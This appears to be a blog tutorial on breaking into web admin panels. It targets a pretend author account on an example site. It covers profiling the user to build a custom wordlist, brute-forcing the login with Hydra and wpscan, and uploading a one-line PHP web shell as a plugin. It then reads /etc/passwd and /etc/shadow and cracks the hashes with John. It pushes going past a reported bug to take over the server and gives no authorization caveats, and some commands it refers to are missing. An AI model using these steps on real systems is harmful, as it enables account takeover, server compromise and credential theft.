Attacking Web Apps Admin Panels The Right Way
Note:Tutorial Not too Beginner Friendly
With some tweaking what you will be learning here can be apply to any Web App. This Tutorial will cover regular CMS and WordPress as a bonus.
Tools:
- Proxychains
- hashid
- Cewl
- John The Repper
- Wpscan
- VM Kali
- Hydra
Part 1:
By taking a quick look at the source code of https://ww.acme.com, we found out the login panel of this website. This finding could brings many possibilities to multiple bugs, but at the same time, not very easy to exploit since many of these bugs always require you to have authenticated users rights.
Most login panels are very easy to enumerate, which will help us get this job done faster. Let’s pretend Doris is an author at acme.com. As an author, she can only install plug-ins. Now, we will try to brute force her password using the following steps:
wc -l file.txt #Display the number of words in the file
Unlike the thousand of unrealistic tutorials about this subject, we won’t be using the SecList/rockyou.txt. For Doris you will need to make a personal wordlist. Following the command above, we scraped www.acme.com and located words with a minimum of six characters (-m 6), and wrote (-w) a custom wordlist (acme-recon.txt). This step is very crucial to the hack. People tend to make passwords based on the website they have control over. Many authors like to link their social media accounts. Using this to our advantage, we will learn about any date of birth, cat names, and more. By knowing this information, we can build a very strong Wordlist.
After learning about her birthday, we will tell John The Reaper to add four numbers to our list. We will do this by adding some rules to John’s config file. In our case, we want any number between zero and nine ([0–9]).
We may alter our wordlist, which presently includes 201 words, now that the rule has been added to the configuration file lets used the command below:
HINT: Make two of the same list, one with the first letter in upper-case and the second in lower-case, then merge them.
Next, we must understand the web form we want to brute force by inspecting the HTML code of the web page in question (located at /account/login.php)
The POST request is handled by /account/login.php, which is the URL we will provide to Hydra. Because we are using a wordlist to target USER Doris. The final parameter to Hydra is /account/login.php:user=doris&password= ^PASSWORD^, where password is acting as a placeholder for our wordlist file entries.
To stop Hydra whenever it finds Doris password, you need to add the login page results whenever you try a wrong password. In this case was “LOGIN INVALID”
BONUS:
If the website was made using WordPress things will be easier, just repeat everything to make the wordlist, then use the command below to brute force the password. You can also brute the USERNAME using --usernames /tmp/userlist.txt:
wpscan - url acme.com -U doris -P /tmp/yourwordlist.txt -t 4
Part 2:
At this point, we discovered Doris’ password was Acme1998. Now, you have this euphoric sense of happiness because you found a nice bug. You went on and reported it. Well, you missed an opportunity to get a way bigger bounty, something most inexperienced hunters will do.
Remember when I told you Doris could install plug-ins? It was for a reason. You will use her rights to install a web shell. After installing the web shell, we will take control of the domain panel control. How to do it? make a file and name it whateveryouwant.php then inside add the following:
<?php system($_REQUEST[“cmd”]); ?>
NOTE: At this point what you can do with this, is only limited to your privilege escalation skills…
Upload this file as if this was a regular plug-in. Navigate to its location acme.com/../shell.php?cmd=ifconfig and test it to make sure it works. AT this point navigate to /etc/passwd and copy its content to a file.txt, do the same with /etc/shadow. Now we need to know what kind of hash shawdow is using.
In order to crack Linux-based hashes with JTR, you will need to first use the unshadow utility to combine the passwd and shadow files from the compromised system.
AT this point you have two options to get the Control Panel password, we can use the same wordlist we made previously, make a new one, or add some new parameters like special characters. In some cases we can just simply use John built-in --format=raw-md5 and trust me, its built-in features work. At first, I wasn’t a believer until I cracked more than 10 password!
To use your own wordlist do as follow:
Conclusion:
When you get familiar with these tools, the things you will be able to do are infinite. Always remember that some login panels have rules and may block your IP from accessing their website. You will only be able to try this on the login panels with no rate limitations. Since you got to this point, consider subscribing for more upcoming infosec tutorials.